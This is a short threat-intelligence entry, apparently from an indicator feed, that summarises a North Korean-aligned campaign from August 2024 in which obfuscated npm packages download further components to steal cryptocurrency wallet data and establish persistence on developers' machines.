North Korea Still Attacking Developers via npm
Essential information
- Published
- 30/09/2024 10:02
- Modified
- 30/09/2024 10:18
- Tags
- 2024-09-30 contagious interview cryptocurrency exfiltration javascript malware moonstone sleet multi-stage attack npm obfuscation persistence python
- Related entities
- 12 observables, 1 intrusion sets (apt), 11 techniques (mitre), 2 malware, 1 others
Description
Recent weeks have seen a resurgence of North Korean-aligned groups targeting developers through npm packages. The campaign, which began on August 12, 2024, involves multiple groups using various publication patterns and attack types. The malicious packages contain obfuscated JavaScript that downloads additional components, including Python scripts and interpreters, to exfiltrate sensitive data from cryptocurrency wallets and establish persistence. Some packages use different approaches, such as directly evaluating JavaScript from remote endpoints or executing batch and PowerShell scripts to deploy and conceal malware. This coordinated effort exploits the trust in the npm ecosystem to compromise developers, infiltrate companies, and steal cryptocurrency or other valuable assets.